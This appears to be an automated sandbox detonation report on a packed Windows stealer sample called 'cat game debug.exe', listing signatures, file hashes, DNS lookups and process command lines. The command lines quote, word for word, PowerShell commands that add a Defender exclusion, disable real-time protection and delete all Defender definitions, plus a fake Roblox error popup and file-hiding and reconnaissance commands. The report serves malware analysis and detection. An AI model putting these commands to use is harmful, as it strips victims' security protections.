| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\cat game debug.exe
"C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
C:\Users\Admin\AppData\Local\Temp\cat game debug.exe
"C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cat game debug.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Couldn\x22t find roblox. Make sure you are from web version not microsoft store version!', 0, 'Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Couldn\x22t find roblox. Make sure you are from web version not microsoft store version!', 0, 'Error', 0+16);close()"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cat game debug.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\cat game debug.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | blank-zqbmd.in | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-zqbmd.in | udp |
| US | 8.8.8.8:53 | blank-zqbmd.in | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI48242\python310.dll
| MD5 | 4a6afa2200b1918c413d511c5a3c041c |
| SHA1 | 39ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3 |
| SHA256 | bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da |
| SHA512 | dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20 |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\VCRUNTIME140.dll
| MD5 | f34eb034aa4a9735218686590cba2e8b |
| SHA1 | 2bc20acdcb201676b77a66fa7ec6b53fa2644713 |
| SHA256 | 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1 |
| SHA512 | d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af |
memory/2044-25-0x00007FFCF3CA0000-0x00007FFCF4106000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI48242\base_library.zip
| MD5 | 483d9675ef53a13327e7dfc7d09f23fe |
| SHA1 | 2378f1db6292cd8dc4ad95763a42ad49aeb11337 |
| SHA256 | 70c28ec0770edefcef46fa27aaa08ba8dc22a31acd6f84cb0b99257dca1b629e |
| SHA512 | f905eb1817d7d4cc1f65e3a5a01bade761bca15c4a24af7097bc8f3f2b43b00e000d6ea23cd054c391d3fdc2f1114f2af43c8bb6d97c1a0ce747763260a864f5 |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_ctypes.pyd
| MD5 | 31859b9a99a29127c4236968b87dbcbb |
| SHA1 | 29b4ee82aa026c10fe8a4f43b40cbd8ec7ea71e5 |
| SHA256 | 644712c3475be7f02c2493d75e6a831372d01243aca61aa8a1418f57e6d0b713 |
| SHA512 | fec3ab9ce032e02c432d714de0d764aab83917129a5e6eeca21526b03176da68da08024d676bc0032200b2d2652e6d442ca2f1ef710a7408bd198995883a943a |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\libffi-7.dll
| MD5 | 6f818913fafe8e4df7fedc46131f201f |
| SHA1 | bbb7ba3edbd4783f7f973d97b0b568cc69cadac5 |
| SHA256 | 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56 |
| SHA512 | 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639 |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_ssl.pyd
| MD5 | 9a7ab96204e505c760921b98e259a572 |
| SHA1 | 39226c222d3c439a03eac8f72b527a7704124a87 |
| SHA256 | cae09bbbb12aa339fd9226698e7c7f003a26a95390c7dc3a2d71a1e540508644 |
| SHA512 | 0f5f58fb47379b829ee70c631b3e107cde6a69dc64e4c993fb281f2d5ada926405ce29ea8b1f4f87ed14610e18133932c7273a1aa209a0394cc6332f2aba7e58 |
memory/2044-48-0x00007FFCFDA80000-0x00007FFCFDA8F000-memory.dmp
memory/2044-47-0x00007FFCF7B40000-0x00007FFCF7B64000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_sqlite3.pyd
| MD5 | 70a7050387359a0fab75b042256b371f |
| SHA1 | 5ffc6dfbaddb6829b1bfd478effb4917d42dff85 |
| SHA256 | e168a1e229f57248253ead19f60802b25dc0dbc717c9776e157b8878d2ca4f3d |
| SHA512 | 154fd26d4ca1e6a85e3b84ce9794a9d1ef6957c3bba280d666686a0f14aa571aaec20baa0e869a78d4669f1f28ea333c0e9e4d3ecd51b25d34e46a0ef74ee735 |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_socket.pyd
| MD5 | 49f87aec74fea76792972022f6715c4d |
| SHA1 | ed1402bb0c80b36956ec9baf750b96c7593911bd |
| SHA256 | 5d8c8186df42633679d6236c1febf93db26405c1706f9b5d767feab440ea38b0 |
| SHA512 | de58d69228395827547e07695f70ef98cdaf041ebaae0c3686246209254f0336a589b58d44b7776ccae24a5bc03b9dc8354c768170b1771855f342eecc5fead4 |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_queue.pyd
| MD5 | bebc7743e8af7a812908fcb4cdd39168 |
| SHA1 | 00e9056e76c3f9b2a9baba683eaa52ecfa367edb |
| SHA256 | cc275b2b053410c6391339149baf5b58df121a915d18b889f184be02bedaf9bc |
| SHA512 | c56496c6396b8c3ec5ec52542061b2146ea80d986dfe13b0d4feb7b5953c80663e34ccd7b7ee99c4344352492be93f7d31f7830ec9ec2ca8a0c2055cb18fa8db |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_lzma.pyd
| MD5 | 864b22495372fa4d8b18e1c535962ae2 |
| SHA1 | 8cfaee73b7690b9731303199e3ed187b1c046a85 |
| SHA256 | fc57bd20b6b128afa5faaac1fd0ce783031faaf39f71b58c9cacf87a16f3325f |
| SHA512 | 9f26fe88aca42c80eb39153708b2315a4154204fc423ca474860072dd68ccc00b7081e8adb87ef9a26b9f64cd2f4334f64bc2f732cd47e3f44f6cf9cc16fa187 |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_hashlib.pyd
| MD5 | 659a5efa39a45c204ada71e1660a7226 |
| SHA1 | 1a347593fca4f914cfc4231dc5f163ae6f6e9ce0 |
| SHA256 | b16c0cc3baa67246d8f44138c6105d66538e54d0afb999f446cae58ac83ef078 |
| SHA512 | 386626b3bad58b450b8b97c6ba51ce87378cddf7f574326625a03c239aa83c33f4d824d3b8856715f413cfb9238d23f802f598084dbd8c73c8f6c61275fdecb5 |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_decimal.pyd
| MD5 | 7cdc590ac9b4ffa52c8223823b648e5c |
| SHA1 | c8d9233acbff981d96c27f188fcde0e98cdcb27c |
| SHA256 | f281bd8219b4b0655e9c3a5516fe0b36e44c28b0ac9170028dd052ca234c357c |
| SHA512 | 919c36be05f5f94ec84e68ecca43c7d43acb8137a043cf429a9e995643ca69c4c101775955e36c15f844f64fc303999da0cbfe5e121eb5b3ffb7d70e3cd08e0b |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\_bz2.pyd
| MD5 | fba120a94a072459011133da3a989db2 |
| SHA1 | 6568b3e9e993c7e993a699505339bbebb5db6fb0 |
| SHA256 | 055a93c8b127dc840ac40ca70d4b0246ac88c9cde1ef99267bbe904086e0b7d3 |
| SHA512 | 221b5a2a9de1133e2866b39f493a822060d3fb85f8c844c116f64878b9b112e8085e61d450053d859a63450d1292c13bd7ec38b89fe2dfa6684ac94e090ec3aa |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\unicodedata.pyd
| MD5 | c697dc94bdf07a57d84c7c3aa96a2991 |
| SHA1 | 641106acd3f51e6db1d51aa2e4d4e79cf71dc1ab |
| SHA256 | 58605600fdaafbc0052a4c1eb92f68005307554cf5ad04c226c320a1c14f789e |
| SHA512 | 4f735678b7e38c8e8b693593696f9483cf21f00aea2a6027e908515aa047ec873578c5068354973786e9cfd0d25b7ab1dd6cbb1b97654f202cbb17e233247a61 |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\sqlite3.dll
| MD5 | 0c4996047b6efda770b03f8f231e39b8 |
| SHA1 | dffcabcd4e950cc8ee94c313f1a59e3021a0ad48 |
| SHA256 | 983f31bc687e0537d6028a9a65f4825cc560bbf3cb3eb0d3c0fcc2238219b5ed |
| SHA512 | 112773b83b5b4b71007f2668b0344bf45db03bbe1f97ae738615f3c4e2f8afb54b3ae095ea1131bf858ddfb1e585389658af5db56561609a154ae6bb80dc79ba |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\select.pyd
| MD5 | b6de7c98e66bde6ecffbf0a1397a6b90 |
| SHA1 | 63823ef106e8fd9ea69af01d8fe474230596c882 |
| SHA256 | 84b2119ed6c33dfbdf29785292a529aabbf75139d163cfbcc99805623bb3863c |
| SHA512 | 1fc26e8edc447d87a4213cb5df5d18f990bba80e5635e83193f2ae5368dd88a81fddfb4575ef4475e9bf2a6d75c5c66c8ed772496ffa761c0d8644fcf40517ca |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\libssl-1_1.dll
| MD5 | ad0a2b4286a43a0ef05f452667e656db |
| SHA1 | a8835ca75768b5756aa2445ca33b16e18ceacb77 |
| SHA256 | 2af3d965863018c66c2a9a2d66072fe3657bbd0b900473b9bbdcac8091686ae1 |
| SHA512 | cceb5ec1dd6d2801abbacd6112393fecbf5d88fe52db86cfc98f13326c3d3e31c042b0cc180b640d0f33681bdd9e6a355dc0fbfde597a323c8d9e88de40b37c4 |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\libcrypto-1_1.dll
| MD5 | bbc1fcb5792f226c82e3e958948cb3c3 |
| SHA1 | 4d25857bcf0651d90725d4fb8db03ccada6540c3 |
| SHA256 | 9a36e09f111687e6b450937bb9c8aede7c37d598b1cccc1293eed2342d11cf47 |
| SHA512 | 3137be91f3393df2d56a3255281db7d4a4dccd6850eeb4f0df69d4c8dda625b85d5634fce49b195f3cc431e2245b8e9ba401baaa08778a467639ee4c1cc23d8d |
C:\Users\Admin\AppData\Local\Temp\_MEI48242\blank.aes
| MD5 | 705023b823cb30d35ab5f90488394f37 |
| SHA1 | 61d5de747c068c2c35132c74ad9eb2e084f60ffd |
| SHA256 | 67286f4a3d187836bc1cac1aa3997973d3fa2fa797d84167c1822673efe6c30a |
| SHA512 | 86f3b758e7a82b60a52f028930ea1da939f6f03f9f8c88c9a42412e3422b4b7e07d1b460eb189a38a90ae5d283b70ebae0c3b0e5f4d62f57f2d8a2212683376b |
memory/2044-54-0x00007FFCF7B10000-0x00007FFCF7B3C000-memory.dmp
memory/2044-57-0x00007FFCFD5F0000-0x00007FFCFD608000-memory.dmp
memory/2044-58-0x00007FFCF98A0000-0x00007FFCF98BF000-memory.dmp
memory/2044-60-0x00007FFCF41C0000-0x00007FFCF433A000-memory.dmp
memory/2044-62-0x00007FFCF97C0000-0x00007FFCF97D9000-memory.dmp
memory/2044-64-0x00007FFCFDA70000-0x00007FFCFDA7D000-memory.dmp
memory/2044-66-0x00007FFCF7AE0000-0x00007FFCF7B0E000-memory.dmp
memory/2044-68-0x00007FFCF3BE0000-0x00007FFCF3C98000-memory.dmp
memory/2044-72-0x00000142AB4F0000-0x00000142AB869000-memory.dmp
memory/2044-71-0x00007FFCF3860000-0x00007FFCF3BD9000-memory.dmp
memory/2044-75-0x00007FFCF3CA0000-0x00007FFCF4106000-memory.dmp
memory/2044-77-0x00007FFCF8130000-0x00007FFCF813D000-memory.dmp
memory/2044-78-0x00007FFCF7B40000-0x00007FFCF7B64000-memory.dmp
memory/2044-76-0x00007FFCF7980000-0x00007FFCF7995000-memory.dmp
memory/2044-80-0x00007FFCF3740000-0x00007FFCF3858000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5t2rf5ap.fqv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2660-87-0x000002152E090000-0x000002152E0B2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e8eb51096d6f6781456fef7df731d97 |
| SHA1 | ec2aaf851a618fb43c3d040a13a71997c25bda43 |
| SHA256 | 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864 |
| SHA512 | 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2 |
memory/2044-104-0x00007FFCF98A0000-0x00007FFCF98BF000-memory.dmp
memory/2044-105-0x00007FFCF41C0000-0x00007FFCF433A000-memory.dmp
memory/2044-106-0x00007FFCF97C0000-0x00007FFCF97D9000-memory.dmp
memory/2044-117-0x00007FFCF3BE0000-0x00007FFCF3C98000-memory.dmp
memory/2044-118-0x00007FFCF3860000-0x00007FFCF3BD9000-memory.dmp
memory/2044-116-0x00007FFCF7AE0000-0x00007FFCF7B0E000-memory.dmp
memory/2044-107-0x00007FFCF3CA0000-0x00007FFCF4106000-memory.dmp
memory/2044-122-0x00000142AB4F0000-0x00000142AB869000-memory.dmp
memory/2044-123-0x00007FFCF3CA0000-0x00007FFCF4106000-memory.dmp
memory/2044-138-0x00007FFCF3CA0000-0x00007FFCF4106000-memory.dmp
memory/2044-153-0x00007FFCF3CA0000-0x00007FFCF4106000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-17 18:09
Reported
2024-06-17 18:12
Platform
win7-20240508-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cat game debug.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2188 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\cat game debug.exe | C:\Users\Admin\AppData\Local\Temp\cat game debug.exe |
| PID 2188 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\cat game debug.exe | C:\Users\Admin\AppData\Local\Temp\cat game debug.exe |
| PID 2188 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\cat game debug.exe | C:\Users\Admin\AppData\Local\Temp\cat game debug.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\cat game debug.exe
"C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
C:\Users\Admin\AppData\Local\Temp\cat game debug.exe
"C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI21882\python310.dll
| MD5 | 4a6afa2200b1918c413d511c5a3c041c |
| SHA1 | 39ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3 |
| SHA256 | bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da |
| SHA512 | dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20 |
memory/2688-23-0x000007FEF5B70000-0x000007FEF5FD6000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-17 18:09
Reported
2024-06-17 18:12
Platform
win10-20240404-en
Max time kernel
133s
Max time network
135s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
